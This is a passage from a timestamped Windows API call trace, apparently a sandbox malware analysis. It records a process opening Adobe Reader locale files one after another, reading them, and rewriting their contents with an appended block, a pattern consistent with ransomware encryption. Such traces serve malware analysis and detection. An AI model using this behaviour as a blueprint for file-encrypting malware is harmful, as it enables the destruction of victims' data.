lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0081.934] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0081.934] WriteFile (in: hFile=0x1ec, lpBuffer=0x2696e48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2696e48*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0081.934] CloseHandle (hObject=0x1ec) returned 1 [0081.935] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\tr_TR\\DigSig.TUR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\tr_tr\\digsig.tur"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0081.935] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0081.935] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x1d200 [0081.935] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0081.935] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0081.936] ReleaseMutex (hMutex=0x168) returned 1 [0081.936] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DigSig.TUR", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0081.936] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DigSig.TUR", cchWideChar=10, lpMultiByteStr=0x1f7346c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DigSig.TUR", lpUsedDefaultChar=0x0) returned 10 [0081.936] ReadFile (in: hFile=0x1ec, lpBuffer=0x1ea5e88, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea5e88*, lpNumberOfBytesRead=0x311f278*=0x4000, lpOverlapped=0x0) returned 1 [0082.550] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x1c200 [0082.550] ReadFile (in: hFile=0x1ec, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0082.551] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x1c200 [0082.551] WriteFile (in: hFile=0x1ec, lpBuffer=0x1ea5e88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea5e88*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0082.551] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0082.552] WriteFile (in: hFile=0x1ec, lpBuffer=0x1ea5e88*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea5e88*, lpNumberOfBytesWritten=0x311f28c*=0x4000, lpOverlapped=0x0) returned 1 [0082.552] CloseHandle (hObject=0x1ec) returned 1 [0082.552] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\tr_TR\\PPKLITE.TUR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\tr_tr\\ppklite.tur"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0082.554] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0082.554] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x7a400 [0082.554] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0082.554] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0082.554] ReleaseMutex (hMutex=0x168) returned 1 [0082.554] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PPKLITE.TUR", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0082.555] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PPKLITE.TUR", cchWideChar=11, lpMultiByteStr=0x1f7366c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PPKLITE.TUR", lpUsedDefaultChar=0x0) returned 11 [0082.555] ReadFile (in: hFile=0x1ec, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x311f278*=0x8000, lpOverlapped=0x0) returned 1 [0082.557] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x79400 [0082.557] ReadFile (in: hFile=0x1ec, lpBuffer=0x1ea5e88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea5e88*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0082.559] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x79400 [0082.559] WriteFile (in: hFile=0x1ec, lpBuffer=0x2694e18*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2694e18*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0082.560] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0082.560] WriteFile (in: hFile=0x1ec, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x311f28c*=0x8000, lpOverlapped=0x0) returned 1 [0082.560] CloseHandle (hObject=0x1ec) returned 1 [0082.561] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\tr_TR\\Services\\Services.asfx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\tr_tr\\services\\services.asfx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0082.562] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0082.562] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xe5 [0082.562] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0082.562] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0082.562] ReleaseMutex (hMutex=0x168) returned 1 [0082.562] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Services.asfx", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0082.562] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Services.asfx", cchWideChar=13, lpMultiByteStr=0x1f7346c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Services.asfx", lpUsedDefaultChar=0x0) returned 13 [0082.563] ReadFile (in: hFile=0x1ec, lpBuffer=0x26bf0f8, nNumberOfBytesToRead=0xe5, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26bf0f8*, lpNumberOfBytesRead=0x311f2bc*=0xe5, lpOverlapped=0x0) returned 1 [0082.564] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0082.564] WriteFile (in: hFile=0x1ec, lpBuffer=0x2863a48*, nNumberOfBytesToWrite=0x66d, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2863a48*, lpNumberOfBytesWritten=0x311f2d0*=0x66d, lpOverlapped=0x0) returned 1 [0082.564] CloseHandle (hObject=0x1ec) returned 1 [0082.565] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\uk_UA\\BRdlang32.UKR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\uk_ua\\brdlang32.ukr"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0082.565] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0082.565] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x3200 [0082.565] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0082.566] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0082.566] ReleaseMutex (hMutex=0x168) returned 1 [0082.566] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BRdlang32.UKR", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0082.566] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BRdlang32.UKR", cchWideChar=13, lpMultiByteStr=0x1f7362c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BRdlang32.UKR", lpUsedDefaultChar=0x0) returned 13 [0082.566] ReadFile (in: hFile=0x1ec, lpBuffer=0x1ea5e88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea5e88*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0082.568] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x2200 [0082.570] ReadFile (in: hFile=0x1ec, lpBuffer=0x1ea5e88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea5e88*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0082.571] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x2200 [0082.572] WriteFile (in: hFile=0x1ec, lpBuffer=0x1ea5e88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea5e88*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0082.572] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0082.572] WriteFile (in: hFile=0x1ec, lpBuffer=0x2865a58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2865a58*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0082.572] CloseHandle (hObject=0x1ec) returned 1 [0082.572] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\uk_UA\\Multimedia.UKR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\uk_ua\\multimedia.ukr"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0082.573] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0082.573] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x13a00 [0082.573] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0082.574] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0082.574] ReleaseMutex (hMutex=0x168) returned 1 [0082.574] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Multimedia.UKR", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0082.574] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Multimedia.UKR", cchWideChar=14, lpMultiByteStr=0x1f7366c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Multimedia.UKR", lpUsedDefaultChar=0x0) returned 14 [0082.574] ReadFile (in: hFile=0x1ec, lpBuffer=0x1ea5e88, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea5e88*, lpNumberOfBytesRead=0x311f278*=0x4000, lpOverlapped=0x0) returned 1 [0082.576] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x12a00 [0082.576] ReadFile (in: hFile=0x1ec, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0082.577] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x12a00 [0082.577] WriteFile (in: hFile=0x1ec, lpBuffer=0x1ea5e88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea5e88*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0082.578] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0082.578] WriteFile (in: hFile=0x1ec, lpBuffer=0x1ea5e88*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea5e88*, lpNumberOfBytesWritten=0x311f28c*=0x4000, lpOverlapped=0x0) returned 1 [0082.578] CloseHandle (hObject=0x1ec) returned 1 [0082.578] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\uk_UA\\SendMail.UKR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\uk_ua\\sendmail.ukr"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0082.580] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0082.580] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x3e00 [0082.580] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0082.580] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0082.580] ReleaseMutex (hMutex=0x168) returned 1 [0082.580] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SendMail.UKR", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.580] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SendMail.UKR", cchWideChar=12, lpMultiByteStr=0x1f7362c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SendMail.UKR", lpUsedDefaultChar=0x0) returned 12 [0082.581] ReadFile (in: hFile=0x1ec, lpBuffer=0x1ea5e88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea5e88*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0082.582] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x2e00 [0082.582] ReadFile (in: hFile=0x1ec, lpBuffer=0x1ea5e88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea5e88*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0082.583] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x2e00 [0082.584] WriteFile (in: hFile=0x1ec, lpBuffer=0x1ea5e88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea5e88*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0082.585] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0082.586] WriteFile (in: hFile=0x1ec, lpBuffer=0x2865a58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2865a58*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0082.586] CloseHandle (hObject=0x1ec) returned 1 [0082.586] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\AdobeCollabSync.CHS" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_cn\\adobecollabsync.chs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0082.587] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0082.587] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x1800 [0082.587] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0082.587] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0082.587] ReleaseMutex (hMutex=0x168) returned 1 [0082.587] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeCollabSync.CHS", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0082.588] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeCollabSync.CHS", cchWideChar=19, lpMultiByteStr=0x1f88b2c, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdobeCollabSync.CHS", lpUsedDefaultChar=0x0) returned 19 [0082.588] ReadFile (in: hFile=0x1ec, lpBuffer=0x1ea5e88, nNumberOfBytesToRead=0x1800, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ea5e88*, lpNumberOfBytesRead=0x311f2bc*=0x1800, lpOverlapped=0x0) returned 1 [0083.055] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0083.055] WriteFile (in: hFile=0x1ec, lpBuffer=0x2665868*, nNumberOfBytesToWrite=0x1d88, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2665868*, lpNumberOfBytesWritten=0x311f2d0*=0x1d88, lpOverlapped=0x0) returned 1 [0083.055] CloseHandle (hObject=0x1ec) returned 1 [0083.056] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\IA32.CHS" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_cn\\ia32.chs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0083.056] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0083.056] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xc00 [0083.057] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0083.057] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0083.057] ReleaseMutex (hMutex=0x168) returned 1 [0083.057] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IA32.CHS", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0083.057] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IA32.CHS", cchWideChar=8, lpMultiByteStr=0x1f7346c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IA32.CHS", lpUsedDefaultChar=0x0) returned 8 [0083.057] ReadFile (in: hFile=0x1ec, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0xc00, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x311f2bc*=0xc00, lpOverlapped=0x0) returned 1 [0083.059] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0083.059] WriteFile (in: hFile=0x1ec, lpBuffer=0x2696e18*, nNumberOfBytesToWrite=0x1188, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2696e18*, lpNumberOfBytesWritten=0x311f2d0*=0x1188, lpOverlapped=0x0) returned 1 [0083.060] CloseHandle (hObject=0x1ec) returned 1 [0083.060] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\SaveAsRTF.CHS" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_cn\\saveasrtf.chs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0083.061] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0083.061] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x3200 [0083.061] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0083.061] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0083.061] ReleaseMutex (hMutex=0x168) returned 1 [0083.061] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SaveAsRTF.CHS", 